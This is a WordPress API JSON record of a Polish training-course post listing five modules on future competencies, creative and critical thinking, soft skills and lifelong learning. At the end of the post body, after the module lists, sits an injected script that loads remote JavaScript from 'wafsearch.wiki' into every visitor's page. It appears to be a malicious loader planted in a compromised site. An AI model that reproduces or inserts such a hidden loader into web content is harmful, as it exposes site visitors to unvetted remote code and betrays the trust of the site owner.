{"id":1191,"date":"2024-03-05T11:02:46","date_gmt":"2024-03-05T10:02:46","guid":{"rendered":"https:\/\/global-metodi.com\/?p=1191"},"modified":"2026-01-08T12:33:28","modified_gmt":"2026-01-08T11:33:28","slug":"kompetencje-przyszlosci-przelamywanie-schematow-myslowych","status":"publish","type":"post","link":"https:\/\/global-metodi.com\/en\/2024\/03\/05\/kompetencje-przyszlosci-przelamywanie-schematow-myslowych\/","title":{"rendered":"Competencies of the future. Breaking thought patterns."},"content":{"rendered":"<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e599b1f pbmit-col-stretched-none pbmit-cursor-color-blackish-color pbmit-bg-color-over-image elementor-section-boxed elementor-section-height-default elementor-section-height-default pbmit-col-stretched-no pbmit-bgimage-no pbmit-bgcolor-yes\" data-id=\"e599b1f\" data-element_type=\"section\" data-cursor=\"blackish-color\">\n<div class=\"elementor-container elementor-column-gap-default\">\n<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-c0a0436 pbmit-bg-color-over-image pbmit-bgimage-no pbmit-bgcolor-yes\" data-id=\"c0a0436\" data-element_type=\"column\">\n<div class=\"elementor-widget-wrap elementor-element-populated\">\n<div class=\"elementor-element elementor-element-b17bbf2 elementor-widget elementor-widget-heading\" data-id=\"b17bbf2\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n<div class=\"elementor-widget-container\">\n<h2 class=\"elementor-heading-title elementor-size-default\">Modu\u0142 1.<br \/>\nNowe wyzwania kompetencyjne<\/h2>\n<\/div>\n<\/div>\n<div class=\"elementor-element elementor-element-549f584 elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"549f584\" data-element_type=\"widget\" data-widget_type=\"icon-list.default\">\n<div class=\"elementor-widget-container\">\n<ul class=\"elementor-icon-list-items\">\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Definicja i znaczenie kompetencji przysz\u0142o\u015bci w dzisiejszym \u015bwiecie pracy.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Om\u00f3wienie kluczowych umiej\u0119tno\u015bci potrzebnych do przetrwania i sukcesu w przysz\u0142o\u015bci.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Zmiany trend\u00f3w zawodowych i ich wp\u0142yw na wymagane kompetencje.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Przyk\u0142ady sukces\u00f3w i pora\u017cek w zakresie dostosowywania si\u0119 do nowych wyzwa\u0144<\/span><\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-e4a15c0 pbmit-bg-color-over-image pbmit-bgimage-no pbmit-bgcolor-yes\" data-id=\"e4a15c0\" data-element_type=\"column\">\n<div class=\"elementor-widget-wrap elementor-element-populated\">\n<div class=\"elementor-element elementor-element-238ab92 elementor-widget elementor-widget-heading\" data-id=\"238ab92\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n<div class=\"elementor-widget-container\">\n<h2 class=\"elementor-heading-title elementor-size-default\">Modu\u0142 2.<br \/>\nKreatywne my\u015blenie<\/h2>\n<\/div>\n<\/div>\n<div class=\"elementor-element elementor-element-760a936 elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"760a936\" data-element_type=\"widget\" data-widget_type=\"icon-list.default\">\n<div class=\"elementor-widget-container\">\n<ul class=\"elementor-icon-list-items\">\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Rola kreatywno\u015bci w rozwoju kompetencji przysz\u0142o\u015bci.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">\u0106wiczenia praktyczne wspieraj\u0105ce my\u015blenie kreatywne.<\/span><\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-7327c44 pbmit-bg-color-over-image pbmit-bgimage-no pbmit-bgcolor-yes\" data-id=\"7327c44\" data-element_type=\"column\">\n<div class=\"elementor-widget-wrap elementor-element-populated\">\n<div class=\"elementor-element elementor-element-b92d557 elementor-widget elementor-widget-heading\" data-id=\"b92d557\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n<div class=\"elementor-widget-container\">\n<h2 class=\"elementor-heading-title elementor-size-default\">Modu\u0142 3.<br \/>\nKrytyczne my\u015blenie<\/h2>\n<\/div>\n<\/div>\n<div class=\"elementor-element elementor-element-592bdd2 elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"592bdd2\" data-element_type=\"widget\" data-widget_type=\"icon-list.default\">\n<div class=\"elementor-widget-container\">\n<ul class=\"elementor-icon-list-items\">\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Czym jest krytyczne my\u015blenie. Jak nauczy\u0107 si\u0119 interpretowa\u0107 informacje.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">\u0179r\u00f3d\u0142a wiarygodnych informacji.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Psychologia manipulacji i b\u0142\u0119dy poznawcze<\/span><\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/section>\n<section class=\"elementor-section elementor-top-section elementor-element elementor-element-5616722 pbmit-col-stretched-none pbmit-cursor-color-blackish-color pbmit-bg-color-over-image elementor-section-boxed elementor-section-height-default elementor-section-height-default pbmit-col-stretched-no pbmit-bgimage-no pbmit-bgcolor-yes\" data-id=\"5616722\" data-element_type=\"section\" data-cursor=\"blackish-color\">\n<div class=\"elementor-container elementor-column-gap-default\">\n<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-0fefbc0 pbmit-bg-color-over-image pbmit-bgimage-no pbmit-bgcolor-yes\" data-id=\"0fefbc0\" data-element_type=\"column\">\n<div class=\"elementor-widget-wrap elementor-element-populated\">\n<div class=\"elementor-element elementor-element-9cfc658 elementor-widget elementor-widget-heading\" data-id=\"9cfc658\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n<div class=\"elementor-widget-container\">\n<h2 class=\"elementor-heading-title elementor-size-default\">Modu\u0142 4.<br \/>\nRozw\u00f3j kompetencji mi\u0119kkich<\/h2>\n<\/div>\n<\/div>\n<div class=\"elementor-element elementor-element-8f79583 elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"8f79583\" data-element_type=\"widget\" data-widget_type=\"icon-list.default\">\n<div class=\"elementor-widget-container\">\n<ul class=\"elementor-icon-list-items\">\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Umiej\u0119tno\u015bci komunikacyjne w kontek\u015bcie wsp\u00f3\u0142pracy z r\u00f3\u017cnorodnymi grupami.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">\u0106wiczenia buduj\u0105ce umiej\u0119tno\u015b\u0107 efektywnej wsp\u00f3\u0142pracy.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Umiej\u0119tno\u015b\u0107 adaptacji do zmian w pracy.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Nowatorskie metody rozwiazywania problem\u00f3w<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Kluczowe kompetencje lider\u00f3w przysz\u0142o\u015bci<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">\u0106wiczenia rozwijaj\u0105ce umiej\u0119tno\u015bci przyw\u00f3dztwa.<\/span><\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-698c84f pbmit-bg-color-over-image pbmit-bgimage-no pbmit-bgcolor-yes\" data-id=\"698c84f\" data-element_type=\"column\">\n<div class=\"elementor-widget-wrap elementor-element-populated\">\n<div class=\"elementor-element elementor-element-add3ec9 elementor-widget elementor-widget-heading\" data-id=\"add3ec9\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n<div class=\"elementor-widget-container\">\n<h2 class=\"elementor-heading-title elementor-size-default\">Modu\u0142 5.<br \/>\nLong Life Learning<\/h2>\n<\/div>\n<\/div>\n<div class=\"elementor-element elementor-element-25729dc elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"25729dc\" data-element_type=\"widget\" data-widget_type=\"icon-list.default\">\n<div class=\"elementor-widget-container\">\n<ul class=\"elementor-icon-list-items\">\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Znaczenie zdolno\u015bci do ci\u0105g\u0142ego uczenia si\u0119 w erze cyfrowej.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Om\u00f3wienie technologii przysz\u0142o\u015bci i ich wp\u0142ywu na rynek pracy.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Neurodydaktyka i neuroprzedsi\u0119biorczo\u015b\u0107<\/span><\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/section>\n<p><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Modu\u0142 1. Nowe wyzwania kompetencyjne Definicja i znaczenie kompetencji przysz\u0142o\u015bci w dzisiejszym \u015bwiecie pracy. Om\u00f3wienie kluczowych umiej\u0119tno\u015bci potrzebnych do przetrwania i sukcesu w przysz\u0142o\u015bci. Zmiany trend\u00f3w zawodowych i ich wp\u0142yw na wymagane kompetencje. Przyk\u0142ady sukces\u00f3w i pora\u017cek w zakresie dostosowywania si\u0119 do nowych wyzwa\u0144 Modu\u0142 2. Kreatywne my\u015blenie Rola kreatywno\u015bci w rozwoju kompetencji przysz\u0142o\u015bci. \u0106wiczenia [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":746,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"inline_featured_image":false,"footnotes":""},"categories":[82],"tags":[],"class_list":["post-1191","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-szkolenia"],"acf":[],"_links":{"self":[{"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/posts\/1191","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/comments?post=1191"}],"version-history":[{"count":2,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/posts\/1191\/revisions"}],"predecessor-version":[{"id":2042,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/posts\/1191\/revisions\/2042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/media\/746"}],"wp:attachment":[{"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/media?parent=1191"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/categories?post=1191"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/tags?post=1191"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}